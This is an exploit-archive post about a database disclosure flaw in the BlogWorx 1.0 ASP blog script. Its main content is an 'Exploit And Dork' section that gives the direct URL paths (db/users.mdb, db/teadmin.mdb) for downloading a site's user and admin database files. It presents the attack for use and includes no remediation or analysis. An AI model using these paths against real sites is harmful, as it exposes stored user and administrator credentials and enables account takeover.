id: 10563
date: 01/01/2010
title: BlogWorx 1.0 Blog Database Disclosure Vulnerability
author: LionTurk
cves: 

===================================================
BlogWorx 1.0 Blog Database Disclosure Vulnerability
===================================================

    [»] Script:             [ BlogWorx Blog ] 
 
    [»] Language:           [ ASP ] 
 
    [»] Download:           [ http://devworx.somee.com/] 

########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
  [»] http://server/db/users.mdb Or db/teadmin.mdb
                                       
 
 
  [»] © 2008 devworx - devworx.somee.com



#  0day.today [2023-03-22]  #